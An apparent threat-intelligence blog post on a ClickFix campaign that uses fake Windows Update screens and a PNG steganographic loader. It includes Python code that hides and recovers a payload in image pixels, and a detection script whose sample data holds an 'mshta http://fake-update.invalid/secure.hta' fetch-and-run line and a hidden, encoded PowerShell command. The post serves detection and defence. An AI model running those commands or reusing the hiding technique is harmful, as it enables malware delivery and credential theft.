
From clipboard to compromise: Steganographic techniques observed in ClickFix campaign

Posted on 12 December 2025

Reading time 3 minutes

Attackers are using convincing fake Windows Update screens to trick people into running commands that install password-stealing malware. The tactic, known as "ClickFix", is a common initial-access method that turns simple social engineering into a multistage, file-light infection chain.

The latest technique, observed by Huntress analysts, involves a website that displays a full-screen imitation of the blue Windows Update page, complete with realistic progress messages, and then coerces the visitor into pressing keyboard shortcuts. When the fake update "finishes", it instructs the user to open the Run box and execute a "critical security update" command.

In cases analysed, the final payload delivered two well-known information-stealing malware strains, LummaC2 and Rhadamanthys, which specialise in grabbing login credentials and other sensitive data from the victim’s machine. 

While the hoax site's source code included comments in Russian, attribution remains unclear. Parts of the infrastructure used in these attacks have since been disrupted as part of "Operation Endgame 3.0", a law-enforcement action in mid-November that took down Rhadamanthys infrastructure, but multiple domains are still hosting the lure.

Why does this matter? 

A distinctive feature of the latest campaign is its use of steganography, the practice of hiding data inside another file or medium, to conceal the malicious code. Rather than simply appending the payload to an existing file, the attackers embed pieces of it in the pixel data of PNG images, so the carrier still parses and displays as an ordinary picture.

The pasted command typically launches mshta.exe, a built-in Windows binary that runs HTML Applications (HTA files). Because it is a legitimate, signed Windows component, its execution blends in with normal system activity and is easily abused. The HTA then downloads and runs PowerShell and .NET components, so the whole chain leans heavily on trusted "living off the land" binaries rather than on a dropped executable.

The final stage is a "steganographic loader". The loader reads the image's raw pixel bytes, reassembles the hidden payload in memory only, and injects it into a legitimate Windows process. Because the payload is never written to disk in recognisable form and the carrier PNG looks like any other image, signature-based detection has nothing to match.
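The round-trip below is an added illustration and not the campaign's loader or Huntress's code: the post does not describe the exact encoding the attackers use, so this example assumes the simplest scheme, one payload bit in the least-significant bit of each RGB sample, behind a 4-byte length prefix. The PNG writer and reader are minimal (8-bit RGB, filter type 0 only) so the whole thing runs offline with the standard library; the carrier image and payload are constructed here.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, body: bytes) -> bytes:
    """One PNG chunk: length, type, data, CRC32 over type+data."""
    return (struct.pack(">I", len(body)) + tag + body
            + struct.pack(">I", zlib.crc32(tag + body) & 0xFFFFFFFF))


def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """Encode raw 8-bit RGB samples as a truecolour PNG (filter type 0 on every row)."""
    assert len(rgb) == width * height * 3
    stride = width * 3
    rows = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b"")


def read_png(data: bytes) -> bytes:
    """Decode a PNG written by write_png back to raw RGB samples (what the loader reads)."""
    assert data[:8] == PNG_SIG, "not a PNG"
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            assert (depth, ctype) == (8, 2), "only 8-bit RGB handled here"
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length                      # 4 length + 4 type + data + 4 CRC
    raw = zlib.decompress(idat)
    stride = width * 3 + 1                      # one filter byte per scanline
    rgb = bytearray()
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        assert row[0] == 0, "only filter type 0 (None) handled here"
        rgb += row[1:]
    return bytes(rgb)


def embed_lsb(rgb: bytes, payload: bytes) -> bytes:
    """Hide a length-prefixed payload in the least-significant bit of successive samples."""
    msg = struct.pack(">I", len(payload)) + payload
    bits = [(byte >> (7 - i)) & 1 for byte in msg for i in range(8)]
    if len(bits) > len(rgb):
        raise ValueError("carrier too small for payload")
    out = bytearray(rgb)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract_lsb(rgb: bytes) -> bytes:
    """Loader side: reassemble bytes from the LSBs; the first 4 bytes give the length."""
    def take(start: int, count: int) -> bytes:
        return bytes(sum((rgb[start + k * 8 + i] & 1) << (7 - i) for i in range(8))
                     for k in range(count))
    length = struct.unpack(">I", take(0, 4))[0]
    return take(32, length)


def make_carrier(width: int = 64, height: int = 64) -> bytes:
    """Constructed gradient image standing in for the attacker's downloaded PNG."""
    return bytes(((x * 4) & 0xFF) if c == 0 else (((y * 4) & 0xFF) if c == 1 else 0x80)
                 for y in range(height) for x in range(width) for c in range(3))


def roundtrip(payload: bytes):
    """Build a stego PNG, then recover the payload the way a loader would.

    Returns (recovered_payload, payload_visible_in_file). The second value is
    what a byte-signature scan of the image would find: False, because the
    payload is scattered one bit per sample and then zlib-compressed into IDAT.
    """
    width, height = 64, 64
    stego_png = write_png(width, height, embed_lsb(make_carrier(width, height), payload))
    recovered = extract_lsb(read_png(stego_png))
    return recovered, payload in stego_png
```

The defensive lesson is in the second return value: the carrier is a valid PNG, its IDAT is compressed noise-like data, and no contiguous run of payload bytes exists anywhere in the file, so a YARA or AV string match on the image is hopeless. Detection has to happen at the consumer, i.e. the process that decodes the image and then allocates executable memory or injects into another process.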

What can I do? 

ClickFix relies heavily on human interaction, and steganography lets the payload bypass signature-based detection and makes analysis harder. The combination is effective at getting past both conventional and automated security controls precisely because it leverages native Windows features, but basic technical measures plus clear guidance to staff can significantly reduce the risk of a social-engineering lure turning into a data breach. Recommendations include:

  • Break the attack chain: This attack hinges on the user pasting into the Windows "Run" dialog. A strong mitigation is to remove that dialog via Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu"), which sets the NoRun DWORD to 1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. Note that other ClickFix variants direct victims to paste into PowerShell, Windows Terminal or the File Explorer address bar instead, so this narrows the path rather than closing it. 
  • Educate users: Reinforce that neither a CAPTCHA check nor Windows Update will ever ask you to paste commands from a web page into the Run prompt or a terminal. 
  • Watch for suspicious activity: Endpoint Detection and Response (EDR) tools can alert when explorer.exe unexpectedly starts mshta.exe, PowerShell or other scripting tools with odd command lines, and when mshta.exe in turn spawns PowerShell. On the network side, Huntress analysts noted repeated use of 141[.]98[.]80[.]175 in this campaign; monitor for, and block, any traffic to or from that address. 
  • Investigate the registry: For responders, Windows keeps a history of Run-box commands under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Each command is stored as a value named a, b, c and so on with a trailing "\1", and the MRUList value lists those letters most-recent-first; reviewing this data can confirm whether a user ran a ClickFix command. 
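Two of the recommendations above, the EDR-style process rule and the RunMRU review, as an added example that is not part of the original post or of any vendor's product. The event records and the `reg export` text are constructed here; the field names (Image, ParentImage, CommandLine, DestinationIp) follow the Sysmon process-creation style but are an assumption, the lure host fake-update.invalid is a placeholder, and the only value taken from the post is the reported address 141.98.80.175.

```python
import re

REPORTED_IP = "141.98.80.175"          # indicator cited in the post (defanged there)
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# Command-line traits typical of a pasted ClickFix command (assumed heuristics).
ODD_CMDLINE = re.compile(
    r"(https?://|mshta|-enc\b|-ec?\b|frombase64string|\biex\b|invoke-expression|"
    r"-w\s*hidden|downloadstring|\.hta\b)", re.I)

SAMPLE_EVENTS = [  # constructed process-creation records
    {"Id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://fake-update.invalid/secure.hta"},
    {"Id": 2, "ParentImage": r"C:\Windows\explorer.exe",           # benign admin script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"Id": 3, "ParentImage": r"C:\Windows\System32\mshta.exe",     # second stage
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc AAAA", "DestinationIp": "141.98.80.175"},
]

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="mshta http://fake-update.invalid/secure.hta\\1"
"c"="\\\\fileserver\\share\\1"
"MRUList"="bca"
'''


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def flag_process_events(events):
    """Return [(event id, [reasons])] for records matching the ClickFix chain."""
    hits = []
    for ev in events:
        parent, image = _basename(ev.get("ParentImage", "")), _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        reasons = []
        if parent == "explorer.exe" and image in SCRIPT_HOSTS and ODD_CMDLINE.search(cmd):
            reasons.append(f"explorer.exe started {image} with an odd command line")
        if parent == "mshta.exe" and image in SCRIPT_HOSTS:
            reasons.append(f"mshta.exe spawned {image} (second stage)")
        if REPORTED_IP in cmd or ev.get("DestinationIp") == REPORTED_IP:
            reasons.append(f"traffic to reported indicator {REPORTED_IP}")
        if reasons:
            hits.append((ev.get("Id"), reasons))
    return hits


def parse_runmru(reg_text: str):
    """Return Run-box history from a `reg export` of RunMRU, most recent first.

    Each command is a REG_SZ named a, b, c... with a trailing "\\1"; MRUList holds
    those letters in most-recent-first order. .reg files escape \\ and " with a backslash.
    """
    in_key, entries, order = False, {}, ""
    for line in reg_text.splitlines():
        if line.startswith("["):
            in_key = line.rstrip("]").lower().endswith(r"\explorer\runmru")
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if not (in_key and m):
            continue
        name, value = m.group(1), re.sub(r"\\(.)", r"\1", m.group(2))  # undo .reg escaping
        if name == "MRUList":
            order = value
        else:
            entries[name] = value[:-2] if value.endswith("\\1") else value
    return [entries[c] for c in order if c in entries]


def triage_runmru(reg_text: str):
    """Pair each Run-box command with whether it looks like a ClickFix paste."""
    return [(cmd, bool(ODD_CMDLINE.search(cmd))) for cmd in parse_runmru(reg_text)]


if __name__ == "__main__":
    for ev_id, reasons in flag_process_events(SAMPLE_EVENTS):
        print(ev_id, "; ".join(reasons))
    for cmd, suspicious in triage_runmru(SAMPLE_REG):
        print("SUSPICIOUS" if suspicious else "ok        ", cmd)
```

On the sample data the benign `-File backup.ps1` launch from explorer.exe is not flagged, while the mshta launch and the hidden, encoded PowerShell child of mshta.exe are; the RunMRU parse puts the pasted mshta command first because MRUList starts with "b". In a live case, export the key from the affected user's NTUSER.DAT or with `reg export`, and treat the RunMRU timestamp (the key's last-write time) as the approximate time of the paste.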